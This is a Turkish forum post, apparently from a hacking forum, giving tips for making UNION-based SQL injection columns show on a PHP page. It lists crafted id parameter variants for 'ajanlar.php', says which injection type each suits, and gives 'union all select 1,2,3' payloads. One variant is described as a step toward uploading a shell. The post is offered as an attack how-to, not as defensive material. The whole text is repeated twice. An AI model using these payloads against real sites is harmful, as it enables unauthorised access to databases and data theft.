kolonları yansıtmak esas çıldırtıcı olay olmasa bile kimileri için korku oluyor
şimdi kolon yansıtcaz 3 kolon olduğunu bulduk ama bir türlü gelmiyor
ne yapalım ? şöyle yapalım
ajanlar.php?id=1 olsun
NOT : burda SQL zayıflığı tespiti yazıp elle hata sayıp lütfen kaç tane varsa sitede o kadar hata var demeyin çok karşıma geldi üzülüyorum açık tektir ve ajanlar.php üzerindedir multiple yapması doğaldır her neyse kolon yansıtalım
ajanlar.php?id=1' -> her tür Sql injectionda geçerlidir
ajanlar.php?id='1 -> her tür Sql injectionda geçerlidir
ajanlar.php?id='1' -> her tür Sql injectionda geçerlidir
ajanlar.php?id=-1' -> her tür Sql injectionda geçerlidir ağırlıklı olarak union based ya da error based ile tamamlanan string based
ajanlar.php?id=-1 -> her tür Sql injectionda geçerlidir ağırlıklı olarak union based ya da string based
ajanlar.php?id=99999.9 -> time based ya da boolean based (blind)
ajanlar.php?id[a]=1 -> sql injection ile shell atılımının kestirmeden serbestliğinin testi
ajanlar.php?id=null -> sadece union based
ajanlar.php?id=0 -> sadece union based
bu id'leri elden geçirdik geri kalanı bilindik union+all+select+1,2,3--
yalnızca string basedde union+all+select+1,2,3--+
yoksa kolon yansımaz
edit : bazende 3 kolon varsa 1,2,3 yerine 1,1,1 yazmakta fayda vardır
hayırlı akşamlar iyi forumlar
şimdi kolon yansıtcaz 3 kolon olduğunu bulduk ama bir türlü gelmiyor
ne yapalım ? şöyle yapalım
ajanlar.php?id=1 olsun
NOT : burda SQL zayıflığı tespiti yazıp elle hata sayıp lütfen kaç tane varsa sitede o kadar hata var demeyin çok karşıma geldi üzülüyorum açık tektir ve ajanlar.php üzerindedir multiple yapması doğaldır her neyse kolon yansıtalım
ajanlar.php?id=1' -> her tür Sql injectionda geçerlidir
ajanlar.php?id='1 -> her tür Sql injectionda geçerlidir
ajanlar.php?id='1' -> her tür Sql injectionda geçerlidir
ajanlar.php?id=-1' -> her tür Sql injectionda geçerlidir ağırlıklı olarak union based ya da error based ile tamamlanan string based
ajanlar.php?id=-1 -> her tür Sql injectionda geçerlidir ağırlıklı olarak union based ya da string based
ajanlar.php?id=99999.9 -> time based ya da boolean based (blind)
ajanlar.php?id[a]=1 -> sql injection ile shell atılımının kestirmeden serbestliğinin testi
ajanlar.php?id=null -> sadece union based
ajanlar.php?id=0 -> sadece union based
bu id'leri elden geçirdik geri kalanı bilindik
union+all+select+1,2,3--yalnızca string basedde union+all+select+1,2,3--+
yoksa kolon yansımaz
edit : bazende 3 kolon varsa 1,2,3 yerine 1,1,1 yazmakta fayda vardır
hayırlı akşamlar iyi forumlar